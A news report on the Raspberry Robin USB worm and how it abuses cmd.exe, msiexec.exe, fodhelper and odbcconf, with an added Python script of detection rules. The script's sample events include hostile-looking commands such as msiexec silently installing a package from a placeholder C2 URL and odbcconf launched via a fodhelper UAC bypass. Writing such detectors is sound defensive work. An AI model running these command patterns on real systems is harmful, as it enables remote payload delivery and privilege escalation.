Red Canary intelligence analysts have discovered a new Windows malware that spreads using external USB drives.
This malware was first observed in September 2021 and is linked to a cluster of malicious activity dubbed Raspberry Robin.
Red Canary’s Detection Engineering team detected the worm in many customers’ networks, some in the technology and manufacturing sectors.
It spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.
Once the drive is attached, the worm spawns a new process: it uses cmd.exe to launch a malicious file stored on the infected drive.
It then reaches out to its command-and-control (C2) servers, likely hosted on compromised QNAP devices, using Microsoft Standard Installer (msiexec.exe), and it also uses TOR exit nodes as additional C2 infrastructure.
“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” the researchers said.
“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
They are yet to find out whether it establishes persistence, and through which methods. The malware is suspected to install a malicious DLL file on infected machines to resist removal between restarts.
Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper and odbcconf.
The first allows it to bypass User Account Control (UAC), while the second helps it execute and configure the DLL.
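The behaviours described above (cmd.exe launching a file from a removable drive, msiexec.exe pointed at a remote package, and odbcconf.exe spawned by fodhelper.exe) are the kind of parent/child and command-line patterns a detection engineer would hunt for in process-creation telemetry. The following is an added example, not code from Red Canary or from the article: it runs three simple rules over a handful of constructed sample events. The event records, the placeholder domain and file paths, and the set of removable drive letters are all assumptions made for the example; in real telemetry the removable-drive letters would come from volume information rather than a hard-coded set.

```python
import ntpath
import re
from typing import Dict, Iterable, List, Set, Tuple

# Constructed sample Windows process-creation events (not telemetry from the article).
# Each record carries an id, the parent image, the created image and its command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "1", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /R "E:\setup.bat"'},  # file on a removable drive (constructed)
    {"id": "2", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /q /i http://c2.example.invalid/pkg.msi"},  # placeholder domain
    {"id": "3", "parent": r"C:\Windows\System32\fodhelper.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe -f C:\Users\Public\payload.rsp"},  # placeholder path
    {"id": "4", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\user\Downloads\tool.msi"'},  # local install, should not fire
]

DRIVE_RE = re.compile(r"\b([A-Za-z]):\\")  # drive-letter references such as E:\...
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def rule_cmd_from_removable(ev: Dict[str, str], removable: Set[str]) -> bool:
    """cmd.exe whose command line references a file on a removable drive letter."""
    if _name(ev["image"]) != "cmd.exe":
        return False
    referenced = {m.group(1).upper() for m in DRIVE_RE.finditer(ev["cmdline"])}
    wanted = {d.rstrip(":").upper() for d in removable}
    return bool(referenced & wanted)


def rule_msiexec_remote_package(ev: Dict[str, str]) -> bool:
    """msiexec.exe asked to fetch its package from a URL, i.e. external network use."""
    return _name(ev["image"]) == "msiexec.exe" and URL_RE.search(ev["cmdline"]) is not None


def rule_fodhelper_spawns_odbcconf(ev: Dict[str, str]) -> bool:
    """odbcconf.exe created by fodhelper.exe: the UAC bypass followed by DLL loading."""
    return _name(ev["parent"]) == "fodhelper.exe" and _name(ev["image"]) == "odbcconf.exe"


def evaluate(events: Iterable[Dict[str, str]], removable: Set[str]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) pairs for every rule that fires on each event."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if rule_cmd_from_removable(ev, removable):
            hits.append((ev["id"], "cmd_from_removable_drive"))
        if rule_msiexec_remote_package(ev):
            hits.append((ev["id"], "msiexec_remote_package"))
        if rule_fodhelper_spawns_odbcconf(ev):
            hits.append((ev["id"], "fodhelper_spawns_odbcconf"))
    return hits


if __name__ == "__main__":
    # Assumed removable-drive letters; real deployments would derive these from volume telemetry.
    for event_id, rule in evaluate(SAMPLE_EVENTS, {"E:", "F:"}):
        print(f"event {event_id}: {rule}")
```

Each rule is deliberately narrow and independent, so a single benign msiexec.exe install (event 4) does not fire, while the three stages described in the article each produce a separate, attributable hit that an analyst can correlate by host and time.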
Red Canary analysts have been able to closely inspect what the newly discovered malware does on infected systems, but several questions remain unanswered.
“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said.
“One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis.”
There is no information on the malware’s end-stage malicious tasks, and the goal of Raspberry Robin’s operators is still unknown.